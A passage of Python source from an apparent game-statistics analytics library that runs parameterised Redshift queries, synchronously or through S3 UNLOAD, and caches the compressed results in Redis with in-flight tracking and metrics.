None\n\n\t\t\tres = dict(\n\t\t\t\trender_as=self.query.display_visual.name.lower(),\n\t\t\t\tseries=None,\n\t\t\t)\n\n\t\t\tif as_json:\n\t\t\t\treturn json.dumps(res)\n\t\t\telse:\n\t\t\t\treturn res\n\n\t\tval = zlib.decompress(val).decode(\"utf-8\")\n\n\t\tif as_json or self.query.as_csv:\n\t\t\treturn val\n\t\telse:\n\t\t\treturn json.loads(val)\n\n\tdef refresh_result(self, wlm_queue=None, executor_class=None, run_async: bool=False):\n\t\tif run_async:\n\t\t\treturn self._refresh_result_async(wlm_queue, executor_class)\n\t\telse:\n\t\t\treturn self._refresh_result_synchronous(wlm_queue, executor_class)\n\n\tdef _refresh_result_synchronous(self, wlm_queue=None, executor_class=None):\n\t\tif executor_class is None:\n\t\t\texecutor_class = RedshiftCursorQueryExecutor\n\n\t\texecutor = executor_class(self.query)\n\t\tengine = self.query.catalogue.engine\n\t\tcache = self.query.catalogue.cache\n\n\t\tas_of_ts = executor.execute(engine, self, cache, wlm_queue)\n\t\t# Record in the cache the last time the results where refreshed.\n\t\t# This is useful for global queries to be able to determine if a parameter permutation\n\t\t# That is not in cache is missing because the data needs a refresh\n\t\t# Or because that permutation is not valid.\n\t\tcache.set(\n\t\t\tself.refresh_as_of_key,\n\t\t\tas_of_ts,\n\t\t\tex=self.query.cache_ttl_seconds\n\t\t)\n\n\t\treturn as_of_ts\n\n\t@property\n\tdef in_flight(self):\n\t\tengine = self.catalogue.engine\n\t\twith self.get_global_meta_context() as meta:\n\t\t\tquery_handle = meta.get(\"query_handle\", None)\n\t\t\tlogger.info(\"Checking in flight status for: %s\" % query_handle)\n\t\t\twith engine.connect() as conn:\n\t\t\t\tresult = is_in_flight(conn, query_handle)\n\t\t\t\tlogger.info(\"is_in_flight=%s\" % str(result))\n\t\t\t\treturn result\n\n\tdef _update_in_flight_status(self, meta):\n\t\tif \"query_heartbeat\" not in meta or \"query_handle\" not in meta:\n\t\t\tmsg = \"query_heartbeat or query_handle missing from meta dict\"\n\t\t\traise RuntimeError(msg)\n\n\t\tquery_heartbeat = meta[\"query_heartbeat\"]\n\t\tquery_handle = meta[\"query_handle\"]\n\t\tnow_ts = calendar.timegm(datetime.utcnow().utctimetuple())\n\t\tengine = self.catalogue.engine\n\n\t\ttime_delta_seconds = now_ts - query_heartbeat\n\t\tif time_delta_seconds >= self.query.ASYNC_HEARTBEAT_INTERVAL:\n\t\t\twith engine.connect() as conn:\n\t\t\t\tif is_in_flight(conn, query_handle):\n\t\t\t\t\t# The query is still running\n\t\t\t\t\tmeta[\"query_heartbeat\"] = now_ts\n\t\t\t\telse:\n\t\t\t\t\t# The query either failed or just finished\n\t\t\t\t\t# Even if we clean up inflight here, the resolution lambda should\n\t\t\t\t\t# resolve without errors.\n\t\t\t\t\tself.cleanup_in_flight_data(meta)\n\t\t\t\t\t# Unload timeout alert\n\t\t\t\t\tif meta.get(\"unload_running\", False) and \"unload_start\" in meta:\n\t\t\t\t\t\tunload_start = meta[\"unload_start\"]\n\t\t\t\t\t\tunload_delta_seconds = now_ts - unload_start\n\t\t\t\t\t\tif unload_delta_seconds > 300: # Lambdas time out after 5 minutes\n\t\t\t\t\t\t\tmeta[\"unload_running\"] = False\n\t\t\t\t\t\t\tmsg = \"Unload timed out: '%s' took more than 300 seconds\"\n\t\t\t\t\t\t\traise RuntimeError(msg % self.unload_key)\n\n\t\t\t\t\t# Informational duration alert\n\t\t\t\t\tif \"most_recent_duration\" in meta:\n\t\t\t\t\t\tmost_recent_duration = meta[\"most_recent_duration\"]\n\t\t\t\t\t\tcurrent_duration = now_ts - meta[\"query_start\"]\n\t\t\t\t\t\tif current_duration > (most_recent_duration * 10):\n\t\t\t\t\t\t\tmsg = \"Query handle %s duration is 10x the previous run\"\n\t\t\t\t\t\t\tlogger.warning(msg % meta[\"query_handle\"])\n\n\tdef refresh_results_from_unload_manifest(self, manifest_key):\n\t\tlogger.info(\"About to aquire meta context\")\n\t\tacquire_start = time.time()\n\t\twith self.get_global_meta_context() as meta:\n\t\t\tacquire_end = time.time()\n\t\t\tlogger.info(\n\t\t\t\t\"Acquiring context took: %i seconds\" % int(acquire_end - acquire_start)\n\t\t\t)\n\t\t\tnow = calendar.timegm(datetime.utcnow().utctimetuple())\n\t\t\tif \"query_start\" in meta:\n\t\t\t\tstart_ts = meta[\"query_start\"]\n\t\t\t\tend_ts = now\n\t\t\t\tmeta[\"query_end\"] = end_ts\n\t\t\t\tduration = end_ts - start_ts\n\t\t\t\tmeta[\"most_recent_duration\"] = duration\n\t\t\t\tlogger.info(\"Query Execution Duration: %s seconds\" % duration)\n\t\t\telse:\n\t\t\t\tstart_ts = now\n\n\t\t\t# Register that we're working on unloading\n\t\t\tmeta[\"unload_start\"] = now\n\t\t\tmeta[\"unload_running\"] = True\n\n\t\t\tcursor = S3ManifestCursor(\n\t\t\t\tself,\n\t\t\t\tmanifest_key,\n\t\t\t\tstart_ts,\n\t\t\t\tfetch_size=self.query.fetch_size\n\t\t\t)\n\t\t\tcache = self.catalogue.cache\n\t\t\tlogger.info(\"About to begin updating cache\")\n\t\t\tcache_update_start = time.time()\n\n\t\t\ttry:\n\t\t\t\tself.query.update_cache(self, cursor, cache)\n\t\t\tfinally:\n\t\t\t\tmeta[\"unload_running\"] = False\n\t\t\t\tself.cleanup_in_flight_data(meta)\n\n\t\t\tcache_update_end = time.time()\n\t\t\tcache_update_duration = cache_update_end - cache_update_start\n\t\t\tlogger.info(\n\t\t\t\t\"Updating Cache Took: %s seconds\" % str(round(cache_update_duration, 2))\n\t\t\t)\n\n\t@property\n\tdef most_recent_duration(self):\n\t\tmeta = self.read_only_global_meta\n\t\tif \"most_recent_duration\" in meta:\n\t\t\treturn meta[\"most_recent_duration\"]\n\t\telse:\n\t\t\treturn None\n\n\t@property\n\tdef most_recent_query_handle(self):\n\t\tmeta = self.read_only_global_meta\n\t\tif \"query_handle\" in meta:\n\t\t\treturn meta[\"query_handle\"]\n\t\telse:\n\t\t\treturn None\n\n\tdef cleanup_in_flight_data(self, meta):\n\t\tmeta[\"in_flight\"] = False\n\n\tdef _refresh_result_async(self, wlm_queue=None, executor_class=None):\n\t\tif not self.catalogue.aws_configured:\n\t\t\tmsg = \"An AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY, and S3_UNLOAD_BUCKET are required.\"\n\t\t\traise RuntimeError(msg)\n\t\tlogger.info(\"Async refreshing query: %s\" % self.unload_key)\n\n\t\tif executor_class is None:\n\t\t\texecutor_class = RedshiftAsyncQueryExecutor\n\n\t\texecutor = executor_class(self.query)\n\t\tengine = self.query.catalogue.engine\n\t\tcache = self.query.catalogue.cache\n\n\t\twith self.get_global_meta_context() as meta:\n\t\t\tif meta.get(\"in_flight\", False):\n\t\t\t\tlogger.info(\"Query is in_flight will update in_flight status\")\n\t\t\t\t# This query is currently running on the cluster\n\t\t\t\t# Update the in_flight statistics\n\t\t\t\tself._update_in_flight_status(meta)\n\t\t\telse:\n\t\t\t\tlogger.info(\"Query is not in_flight - will execute UNLOAD statement\")\n\n\t\t\t\t# Launch the query, which should return quickly.\n\t\t\t\tas_of_ts = executor.execute(engine, self, cache, meta)\n\n\t\t\t\t# Record in the cache the last time the results where refreshed.\n\t\t\t\t# This is useful for global queries to be able to determine if a\n\t\t\t\t# parameter permutation that is not in cache is missing because\n\t\t\t\t# the data needs a refresh or because that permutation is not valid.\n\t\t\t\tcache.set(\n\t\t\t\t\tself.refresh_as_of_key,\n\t\t\t\t\tas_of_ts,\n\t\t\t\t\tex=self.query.cache_ttl_seconds\n\t\t\t\t)\n\n\t\t\treturn meta[\"query_start\"]\n\n\tdef generate_params_with_vals(self, override_vals):\n\t\tcopied_supplied_params = copy(self.supplied_parameters)\n\t\tcopied_supplied_params.update(override_vals)\n\t\treturn ParameterizedRedshiftQuery(self.query, copied_supplied_params)\n\n\nclass RedshiftQueryMeta(type):\n\t\"\"\"A Metaclass to provide automatic registration of all queries in the hsredshift.analytics.library package\"\"\"\n\tdef __init__(self, name, bases, dict):\n\t\ttype.__init__(self, name, bases, dict)\n\t\t# Filter out the Query Base Class\n\t\tif name != \"BaseRedshiftQuery\":\n\t\t\tRedshiftCatalogue.register(self)\n\n\n@add_metaclass(RedshiftQueryMeta)\nclass BaseRedshiftQuery(object):\n\tname = None\n\tenabled = True\n\tis_premium = False\n\tis_personalized = False\n\tis_backfillable = False\n\tglobal_query = False\n\traw_series_data = False\n\tas_csv = False\n\tuses_archetypes = False\n\tfetch_size = 10000\n\t# 30 Day TTL (30 * 24 * 60 * 60)\n\tcache_ttl_seconds = 2592000\n\trefresh_interval = QueryRefreshInterval.EVERY_THREE_HOURS\n\trefresh_priority = QueryRefreshPriority.MEDIUM\n\tmeta_lock_wait_seconds = 10\n\tcache_warming_enabled = True\n\tstmt = None\n\tdisplay_visual = None\n\trequired_parameters = []\n\tavailable_parameters = []\n\texclude_from_global_permutations_key = []\n\t# MIN_PILOTS protects privacy and protects from huge result sets\n\tMIN_PILOTS = 10\n\t# MIN_ELIGIBLE_GAMES protects from having having too many results\n\tMIN_ELIGIBLE_GAMES = 400\n\t# MIN_STANDARD_GAMES & MIN_WILD_GAMES ensure we have enough data for statistical significance\n\t# in the context of whatever filters might be further restricting the eligible games\n\tMIN_STANDARD_GAMES = 400\n\tMIN_WILD_GAMES = 200\n\tASYNC_HEARTBEAT_INTERVAL = 60\n\tAPPLICATION_PREFIX = \"RedshiftQuery\"\n\n\tdef __init__(self, catalogue):\n\t\tself.catalogue = catalogue\n\n\tdef __str__(self):\n\t\treturn self.name\n\n\tdef build_full_params(self, partial_params):\n\t\ttransformed_params = self._transform_params(partial_params)\n\t\treturn ParameterizedRedshiftQuery(self, transformed_params)\n\n\tdef _transform_params(self, partial_params):\n\t\tresult = partial_params\n\t\tfor available_param in self.available_parameters:\n\t\t\tif is_filter_param(available_param):\n\t\t\t\tfilter = get_filter(available_param)\n\t\t\t\tresult = filter.transform_supplied_params(result)\n\t\treturn result\n\n\tdef bind_params(self):\n\t\tresult = {}\n\t\tfor param_name, bind in self.stmt.compile().binds.items():\n\t\t\tresult[param_name] = bind\n\t\treturn result\n\n\tdef get_default_value(self, available_param):\n\t\traise NotImplementedError(\"Must be implemented by queries exposing non-required, non-filter parameters\")\n\n\tdef get_default_value_for_filter(self, filter):\n\t\t# Queries whose default value deviates from the norm must sub-class this\n\t\treturn filter.get_default_member()\n\n\tdef get_supported_filter_members(self, filter):\n\t\t# Return the set that have is_enabled = True\n\t\t# Sub-classes can override this method on an individual basis to expose additional filters\n\t\treturn [member for member in filter.__members__.values() if member.is_enabled]\n\n\tdef is_supported_filter_member(self, filter, member):\n\t\treturn member in self.get_supported_filter_members(filter)\n\n\tdef filter_member_is_premium(self, filter, filter_member):\n\t\treturn filter_member.is_premium\n\n\t@property\n\tdef query_hash(self):\n\t\tif not hasattr(self, \"_query_hash\"):\n\t\t\tself._query_hash = hashlib.md5(str(self.stmt).encode(\"utf-8\")).hexdigest()\n\t\treturn self._query_hash\n\n\t@property\n\tdef cache_key_prefix(self):\n\t\t\"\"\"Useful for SCAN prefix* to discover what is cached for this query\"\"\"\n\t\treturn \"%s:%s\" % (self.APPLICATION_PREFIX, self.name)\n\n\tdef as_result_set(self):\n\t\treturn ResultSetRedshiftQueryExecutor(self)\n\n\tdef get_available_non_filter_parameters(self):\n\t\treturn [param for param in self.available_parameters if not is_filter_param(param)]\n\n\tdef evict_all_from_cache(self):\n\t\tcount = 0\n\t\tfor permutation in self.generate_cachable_parameter_permutations():\n\t\t\tparameterized_query = self.build_full_params(permutation)\n\t\t\tparameterized_query.evict_cache()\n\t\t\tcount += 1\n\t\treturn count\n\n\tdef mark_all_stale(self):\n\t\tcount = 0\n\t\tfor permutation in self.generate_cachable_parameter_permutations():\n\t\t\tparameterized_query = self.build_full_params(permutation)\n\t\t\tparameterized_query.mark_stale()\n\t\t\tcount += 1\n\t\treturn count\n\n\tdef generate_cachable_parameter_permutations(self):\n\t\tresult = []\n\n\t\tfor parameter_permutation in self.generate_supported_filter_permutations():\n\t\t\tfor non_filter_param in self.get_available_non_filter_parameters():\n\t\t\t\tparameter_permutation[non_filter_param] = \"*\"\n\t\t\tresult.append(parameter_permutation)\n\n\t\treturn result\n\n\tdef generate_personalized_parameter_permutation_bases(self):\n\t\tif not self.is_personalized:\n\t\t\traise RuntimeError(\"Can only generate cachable permutation bases for personalized queries.\")\n\t\treturn self.generate_supported_filter_permutations(exclude=[\"Region\"])\n\n\tdef generate_supported_filter_permutations(self, exclude=[]):\n\t\tfilters = []\n\t\tfor param in self.available_parameters:\n\t\t\tif is_filter_param(param) and param not in exclude:\n\t\t\t\tfilters.append(get_filter(param))\n\n\t\tpermutations = []\n\t\tself._generate_permutations(permutations, [], filters)\n\t\treturn permutations\n\n\tdef _generate_permutations(self, accumulator, members, filters):\n\t\tif len(filters):\n\t\t\tnext_filter = filters.pop()\n\t\t\tfor member in self.get_supported_filter_members(next_filter):\n\t\t\t\tmembers.append(member)\n\t\t\t\tself._generate_permutations(accumulator, members, filters)\n\t\t\t\tmembers.pop()\n\t\t\tfilters.append(next_filter)\n\t\telse:\n\t\t\tfinal_permutation = {}\n\t\t\tfor m in members:\n\t\t\t\tfinal_permutation[m.filter_name()] = m.name\n\t\t\taccumulator.append(final_permutation)\n\n\tdef execute(self, engine, params):\n\t\tresult = self.as_result_set().execute(engine, params, as_json=False)\n\t\tresponse_payload = self.to_response_payload(result, params)\n\t\treturn response_payload\n\n\tdef _prepare_param_overrides(self, non_filter_params, current_non_filter_param_vals):\n\t\tresult = {}\n\t\tfor param, val in zip(non_filter_params, current_non_filter_param_vals):\n\t\t\tfilter_enum = get_filter(param)\n\t\t\tif filter_enum:\n\t\t\t\tfilter_member = filter_enum.from_int(int(val))\n\t\t\t\tresult[param] = filter_member.name\n\t\t\telse:\n\t\t\t\tresult[param] = val\n\t\treturn result\n\n\tdef update_cache(self, params, cursor, cache, pipeline=True, pipeline_batch_size=10000):\n\t\t# cursor is an iterable of row records from the query statement.\n\t\t# cache is a python redis client.\n\t\t# The order by in the query will be preserved in the cursor.\n\t\tatomic_data_units = 0\n\t\tif not self.global_query:\n\t\t\t# This is a query like trending_decks, or cards_included\n\t\t\t# Or it is a query for personalized stats\n\t\t\t# The entire result set will get stored in a single value\n\t\t\trecord_set = []\n\t\t\tfor row in cursor:\n\t\t\t\tatomic_data_units += len(row)\n\t\t\t\trecord_set.append(row)\n\n\t\t\tself._send_record_set_to_cache(cache, cursor.as_of, params, record_set)\n\t\t\tmetric_fields = {\n\t\t\t\t\"units\": atomic_data_units,\n\t\t\t}\n\t\t\tmetric_fields.update(\n\t\t\t\tparams.supplied_non_filters_dict\n\t\t\t)\n\t\t\tself.catalogue.metrics.influx_metric(\n\t\t\t\t\"redshift_data_units\",\n\t\t\t\tmetric_fields,\n\t\t\t\tquery_name=params.query_name,\n\t\t\t\t**params.supplied_filters_dict\n\t\t\t)\n\t\telse:\n\t\t\tnon_filter_params = self.exclude_from_global_permutations_key\n\t\t\tcurrent_non_filter_param_vals = None\n\t\t\trecord_set = []\n\t\t\tcurrent_pipeline_batch = 0\n\t\t\tcache_or_pipeline = cache\n\t\t\tif pipeline:\n\t\t\t\tcache_or_pipeline = cache.pipeline(transaction=True)\n\n\t\t\tfor row in cursor:\n\t\t\t\tatomic_data_units += len(row)\n\t\t\t\trow_vals = []\n\t\t\t\tfor non_filter_param in non_filter_params:\n\t\t\t\t\trow_val = row.get(non_filter_param.lower(), None)\n\t\t\t\t\tif not row_val:\n\t\t\t\t\t\traise ValueError(\"a column name must match the non_filter_param\")\n\t\t\t\t\trow_vals.append(row_val)\n\n\t\t\t\tif not current_non_filter_param_vals:\n\t\t\t\t\tcurrent_non_filter_param_vals = row_vals\n\n\t\t\t\tif row_vals == current_non_filter_param_vals:\n\t\t\t\t\trecord_set.append(row)\n\t\t\t\telse:\n\t\t\t\t\tcurrent_val_params = params.generate_params_with_vals(\n\t\t\t\t\t\tdict(self._prepare_param_overrides(\n\t\t\t\t\t\t\tnon_filter_params,\n\t\t\t\t\t\t\tcurrent_non_filter_param_vals\n\t\t\t\t\t\t))\n\t\t\t\t\t)\n\t\t\t\t\tself._send_record_set_to_cache(\n\t\t\t\t\t\tcache_or_pipeline,\n\t\t\t\t\t\tcursor.as_of,\n\t\t\t\t\t\tcurrent_val_params,\n\t\t\t\t\t\trecord_set,\n\t\t\t\t\t)\n\t\t\t\t\tcurrent_pipeline_batch += 1\n\n\t\t\t\t\tmetric_fields = {\n\t\t\t\t\t\t\"units\": atomic_data_units,\n\t\t\t\t\t}\n\t\t\t\t\tmetric_fields.update(\n\t\t\t\t\t\tcurrent_val_params.supplied_non_filters_dict\n\t\t\t\t\t)\n\t\t\t\t\tself.catalogue.metrics.influx_metric(\n\t\t\t\t\t\t\"redshift_data_units\",\n\t\t\t\t\t\tmetric_fields,\n\t\t\t\t\t\tquery_name=current_val_params.query_name,\n\t\t\t\t\t\t**current_val_params.supplied_filters_dict\n\t\t\t\t\t)\n\t\t\t\t\tatomic_data_units = 0\n\n\t\t\t\t\t# Reset the record_set buffer for the next chunk of records\n\t\t\t\t\trecord_set = [row]\n\t\t\t\t\tcurrent_non_filter_param_vals = row_vals\n\n\t\t\t\tif pipeline:\n\t\t\t\t\tif current_pipeline_batch >= pipeline_batch_size:\n\t\t\t\t\t\t# The execute statement will reset the pipeline's state\n\t\t\t\t\t\tcache_or_pipeline.execute()\n\t\t\t\t\t\tcurrent_pipeline_batch = 0\n\n\t\t\tif len(record_set):\n\t\t\t\t# Flush the last result to cache\n\t\t\t\tcurrent_val_params = params.generate_params_with_vals(\n\t\t\t\t\tdict(self._prepare_param_overrides(\n\t\t\t\t\t\tnon_filter_params,\n\t\t\t\t\t\tcurrent_non_filter_param_vals\n\t\t\t\t\t))\n\t\t\t\t)\n\t\t\t\tself._send_record_set_to_cache(\n\t\t\t\t\tcache_or_pipeline,\n\t\t\t\t\tcursor.as_of,\n\t\t\t\t\tcurrent_val_params,\n\t\t\t\t\trecord_set,\n\t\t\t\t)\n\t\t\t\tmetric_fields = {\n\t\t\t\t\t\"units\": atomic_data_units,\n\t\t\t\t}\n\t\t\t\tmetric_fields.update(\n\t\t\t\t\tcurrent_val_params.supplied_non_filters_dict\n\t\t\t\t)\n\t\t\t\tself.catalogue.metrics.influx_metric(\n\t\t\t\t\t\"redshift_data_units\",\n\t\t\t\t\tmetric_fields,\n\t\t\t\t\tquery_name=current_val_params.query_name,\n\t\t\t\t\t**current_val_params.supplied_filters_dict\n\t\t\t\t)\n\n\t\t\tif pipeline:\n\t\t\t\t# Commit any outstanding pipeline work (noop if nothing was set())\n\t\t\t\t# This will also release the connection if bound\n\t\t\t\tcache_or_pipeline.execute()\n\n\tdef _send_record_set_to_cache(self, cache, as_of, params, record_set):\n\t\tas_of_datetime = None\n\t\tif as_of:\n\t\t\tas_of_datetime = datetime.utcfromtimestamp(as_of).replace(tzinfo=pytz.utc)\n\n\t\tchart_series = self.to_chart_series(params, record_set)\n\t\ttry:\n\t\t\tself.validate_chart_series(chart_series, params.supplied_filters_dict)\n\t\texcept UserWarning as w:\n\t\t\tself.catalogue.metrics.influx_metric(\n\t\t\t\t\"redshift_query_warnings\",\n\t\t\t\t{\n\t\t\t\t\t\"message\": str(w),\n\t\t\t\t},\n\t\t\t\tquery_name=params.query_name,\n\t\t\t\t**params.supplied_filters_dict\n\t\t\t)\n\n\t\tif self.raw_series_data:\n\t\t\tresult = chart_series\n\t\telse:\n\t\t\tresult = {\n\t\t\t\t\"render_as\": self.display_visual.name.lower(),\n\t\t\t\t\"series\": chart_series,\n\t\t\t\t\"as_of\": as_of_datetime,\n\t\t\t}\n\n\t\tserialized_result = self.serialize_data_for_cache(result)\n\n\t\tcompressed_val = zlib.compress(serialized_result.encode(\"utf-8\"))\n\n\t\twith params.get_meta_context() as meta:\n\t\t\tmeta[\"as_of\"] = as_of\n\t\t\tmeta[\"is_stale\"] = False\n\t\t\tmeta[\"query_hash\"] = self.query_hash\n\n\t\tcache.set(params.cache_key, compressed_val, ex=self.cache_ttl_seconds)\n\n\tdef serialize_data_for_cache(self, data):\n\t\tif self.as_csv:\n\t\t\tcolumn_names = self.csv_column_names()\n\t\t\toutput = StringIO()\n\t\t\tcsvwriter = DictWriter(output, fieldnames=column_names)\n\t\t\tcsvwriter.writeheader()\n\t\t\tcsvwriter.writerows(data)\n\t\t\treturn output.getvalue()\n\t\telse:\n\t\t\treturn json.dumps(\n\t\t\t\tdata,\n\t\t\t\tcls=HSRedshiftJSONEncoder,\n\t\t\t\tseparators=(\",\", \":\"),\n\t\t\t)\n\n\tdef csv_column_names(self):\n\t\treturn [c.name for c in self.stmt.columns]\n\n\tdef csv_column_converters(self):\n\t\tresult = collections.OrderedDict()\n\t\tfor c in self.stmt.columns:\n\t\t\tresult[c.name] = c.type.python_type\n\t\treturn result\n\n\tdef to_chart_series(self, params, result_set):\n\t\treturn result_set\n\n\tdef validate_chart_series(self, chart_series, params={}):\n\t\t# This can be optionally implemented by subclasses to validate the output of\n\t\t# to_chart_series. UserWarnings will be caught and sent to Influx.\n\t\tpass\n\n\tdef example_parameters(self):\n\t\t# This should be implemented by subclasses\n\t\t# In order to use the LocalQueryRunner testing tool\n\t\tpass\n\n\tdef to_response_payload(self, result_set, params):\n\t\tchart_series_data = self.to_chart_series(params, result_set)\n\n\t\tresult = {\n\t\t\t\"render_as\": self.display_visual.name.lower(),\n\t\t\t\"series\": chart_series_data\n\t\t}\n\n\t\treturn result\n\n\t@classmethod\n\tdef local_query(cls, locals):\n\t\tfor loc in locals.values():\n\t\t\tif isclass(loc) and issubclass(loc, cls) and loc != cls:\n\t\t\t\treturn loc()\n\n\tdef to_executable_sql(self, args, engine=None, echo=True):\n\t\tif not engine:\n\t\t\tengine = get_engine_from_environ(echo=echo)\n\n\t\tparams = self.build_full_params(args)\n\t\tcompiled_statement = self.stmt.params(params.final_bind_params).compile(bind=engine)\n\t\tq = QueryStatementGenerator(engine, compiled_statement)\n\t\treturn q.query\n\n\tdef execute_with_args(self, args, engine=None, echo=True, as_table_rows=False, limit=None, print_duration=True):\n\t\tif not engine:\n\t\t\tengine = get_engine_from_environ(echo=echo)\n\n\t\tparams = self.build_full_params(args)\n\t\tif as_table_rows:\n\t\t\tstart = time.time()\n\t\t\tresult = self.as_result_set().execute(engine, params, as_json=False)\n\t\t\tend = time.time()\n\t\t\tduration = round(end - start, 2)\n\t\t\tif print_duration:\n\t\t\t\tprint(\"Duration Seconds: %s\" % duration)\n\t\t\tcolumn_formatters = self._create_column_formatters(result)\n\t\t\tcolumn_names = [column_formatters[c.name].format(c.name) for c in self.stmt.columns]\n\n\t\t\toutput = BytesIO()\n\t\t\tcsvwriter = DictWriter(output, fieldnames=column_names)\n\t\t\tcsvwriter.writeheader()\n\t\t\tif limit is not None:\n\t\t\t\tcount = 0\n\t\t\t\tfor row in result:\n\t\t\t\t\tif count >= limit:\n\t\t\t\t\t\tbreak\n\t\t\t\t\tformatter = lambda k, v: column_formatters[k].format(str(v))\n\t\t\t\t\tformatted_row = {formatter(k, k): formatter(k, v) for k, v in row.items()}\n\t\t\t\t\tcsvwriter.writerow(formatted_row)\n\t\t\t\t\tcount += 1\n\t\t\telse:\n\t\t\t\tfor row in result:\n\t\t\t\t\tformatter = lambda k, v: column_formatters[k].format(str(v))\n\t\t\t\t\tformatted_row = {formatter(k, k): formatter(k, v) for k, v in row.items()}\n\t\t\t\t\tcsvwriter.writerow(formatted_row)\n\t\t\treturn output.getvalue()\n\t\telse:\n\t\t\tstart = time.time()\n\t\t\tresult = self.execute(engine, params)\n\t\t\tend = time.time()\n\t\t\tduration = round(end - start, 2)\n\t\t\tif print_duration:\n\t\t\t\tprint(\"Duration Seconds: %s\" % duration)\n\t\t\treturn json.dumps(result)\n\n\tdef _create_column_formatters(self, results):\n\t\tcolumn_widths = collections.defaultdict(int)\n\t\tfor row in results:\n\t\t\tfor col, val in row.items():\n\t\t\t\tcolumn_widths[col] = max(column_widths[col], len(str(val)), len(str(col)))\n\n\t\treturn {k: \"{:>%is}\" % (v) for k, v in column_widths.items()}\n\n\nclass ResultSetRedshiftQueryExecutor:\n\tdef __init__(self, query):\n\t\tself._query = query\n\n\tdef execute(self, engine, params, wlm_queue=None, as_json=True):\n\t\tgroup = wlm_queue if wlm_queue else self._query.catalogue._wlm_queue\n\t\tconn = engine.connect()\n\t\tconn.execute(\"SET QUERY_GROUP TO '%s';\" % group)\n\t\tcompiled_statement = self._query.stmt.params(params.final_bind_params).compile(bind=conn)\n\n\t\tstart_time = time.time()\n\t\tresult = conn.execute(compiled_statement)\n\t\tend_time = time.time()\n\t\tduration = round(end_time - start_time, 2)\n\t\tlogger.debug(\"Query Runtime: %s\" % duration)\n\n\t\tif as_json:\n\t\t\treturn json.dumps(\n\t\t\t\t(dict(row.items()) for row in result),\n\t\t\t\tcls=HSRedshiftJSONEncoder,\n\t\t\t\tseparators=(\",\", \":\"),\n\t\t\t\titerable_as_array=True\n\t\t\t)\n\t\telse:\n\t\t\treturn [dict(row.items()) for row in result]\n\n\nclass PostgresQueryExecutor:\n\tdef __init__(self, query):\n\t\tself._query = query\n\t\tself.as_of = None\n\n\tdef execute(self, engine, params, cache, wlm_queue=None):\n\t\tconn = engine.connect()\n\t\tcompiled_statement = self._query.stmt.params(params.final_bind_params).compile(bind=conn)\n\t\tas_of = datetime.utcnow()\n\t\t# wrap the ResultProxy to return rows as dicts (like LazyRedshiftCursor)\n\t\tcursor = DictCursorProxy(conn.execute(compiled_statement))\n\t\tcursor.as_of = calendar.timegm(as_of.utctimetuple())\n\n\t\tself._query.update_cache(params, cursor, cache)\n\n\t\treturn cursor.as_of\n\n\nclass DictCursorProxy(object):\n\tdef __init__(self, cursor):\n\t\tself.cursor = cursor\n\t\tif not cursor.returns_rows:\n\t\t\traise ValueError(\"cursor must return rows\")\n\n\tdef __iter__(self):\n\t\treturn self\n\n\tdef __next__(self):\n\t\trow = self.cursor.fetchone()\n\t\tif row is None:\n\t\t\traise StopIteration()\n\t\treturn dict(row.items())\n\n\nclass RedshiftCursorQueryExecutor:\n\tdef __init__(self, query):\n\t\tself._query = query\n\t\tself.cursor_handle = \"%s_cursor_%s\" % (query.name, str(uuid4())[:7])\n\t\tself.as_of = None\n\n\tdef _make_final_stmt(self, engine, conn, params):\n\t\tcompiled_statement = self._query.stmt.params(params.final_bind_params).compile(bind=conn)\n\t\tq = QueryStatementGenerator(engine, compiled_statement)\n\t\treturn \"DECLARE %s CURSOR FOR %s\" % (self.cursor_handle, q.query)\n\n\tdef execute(self, engine, params, cache, wlm_queue=None):\n\t\tgroup = wlm_queue if wlm_queue else \"analytics\"\n\t\tconn = engine.connect()\n\t\tdeclare_statement = self._make_final_stmt(engine, conn, params)\n\n\t\tself.as_of = datetime.utcnow()\n\t\tconn.execute(\"SET QUERY_GROUP TO '%s';\" % group)\n\t\tconn.execute(\"BEGIN;\")\n\t\tconn.execute(str(declare_statement))\n\n\t\tcursor = LazyRedshiftCursor(self, conn, self._query.fetch_size)\n\t\tself._query.update_cache(params, cursor, cache)\n\n\t\tconn.execute(\"CLOSE %s;\" % self.cursor_handle)\n\t\tconn.execute(\"COMMIT;\")\n\t\tconn.close()\n\n\t\treturn cursor.as_of\n\n\nclass RedshiftAsyncQueryExecutor:\n\t\"\"\"Uses UNLOAD command to make query asynchronous.\"\"\"\n\n\tdef __init__(self, query):\n\t\tself._query = query\n\n\tdef _make_async_query_handle(self, params):\n\t\tnamespace = params.catalogue.s3_unload_namespace\n\t\treturn \"%s-unload-%s\" % (namespace, str(uuid4())[:7])\n\n\tdef execute(self, engine, params, cache, meta):\n\t\tas_of = calendar.timegm(datetime.utcnow().utctimetuple())\n\t\tunload_location = params.generate_unload_location(prefix=str(as_of))\n\t\tstmt = params.executable_unload_statement(prefix=str(as_of))\n\t\thandle = self._make_async_query_handle(params)\n\n\t\tlogger.info(\"Query handle for %s is %s\" % (params.unload_key, handle))\n\n\t\tredshift_pid = run_redshift_background_statement(stmt, handle, engine)\n\n\t\tmeta[\"in_flight\"] = True\n\t\tmeta[\"redshift_pid\"] = redshift_pid\n\t\tmeta[\"unload_location\"] = unload_location\n\t\tmeta[\"query_start\"] = as_of\n\t\tmeta[\"query_heartbeat\"] = as_of\n\t\tmeta[\"query_handle\"] = handle\n\n\t\treturn as_of\n\n\nclass LazyRedshiftCursor(object):\n\tdef __init__(self, executor, conn, fetch_size=1000):\n\t\tself._executor = executor\n\t\tself._cursor_handle = executor.cursor_handle\n\t\tself._conn = conn\n\t\tself._fetch_size = fetch_size\n\t\tself._buffer = []\n\n\t@property\n\tdef as_of(self):\n\t\treturn calendar.timegm(self._executor.as_of.utctimetuple())\n\n\tdef _fill_buffer(self):\n\t\tfetch_stmt = \"FETCH FORWARD %i FROM %s;\" % (self._fetch_size, self._cursor_handle)\n\t\tresult = self._conn.execute(fetch_stmt)\n\t\tself._buffer.extend([dict(row.items()) for row in result])\n\n\tdef __iter__(self):\n\t\treturn self\n\n\tdef __next__(self):\n\t\tif not self._buffer:\n\t\t\tself._fill_buffer()\n\n\t\tif self._buffer:\n\t\t\treturn self._buffer.pop(0)\n\t\telse:\n\t\t\traise StopIteration()\n\n\nclass LazyZippedStreamingBodyReader(object):\n\tdef __init__(self, streaming_body, name, is_gzipped=True):\n\t\tself.name = name\n\t\tself.is_gzipped = is_gzipped\n\t\tself.streaming_body = streaming_body\n\t\tif self.is_gzipped:\n\t\t\tself.data = self.streaming_gzip_decompress(streaming_body)\n\t\telse:\n\t\t\tself.data = self.read_in_chunks(streaming_body)\n\t\tself.started = 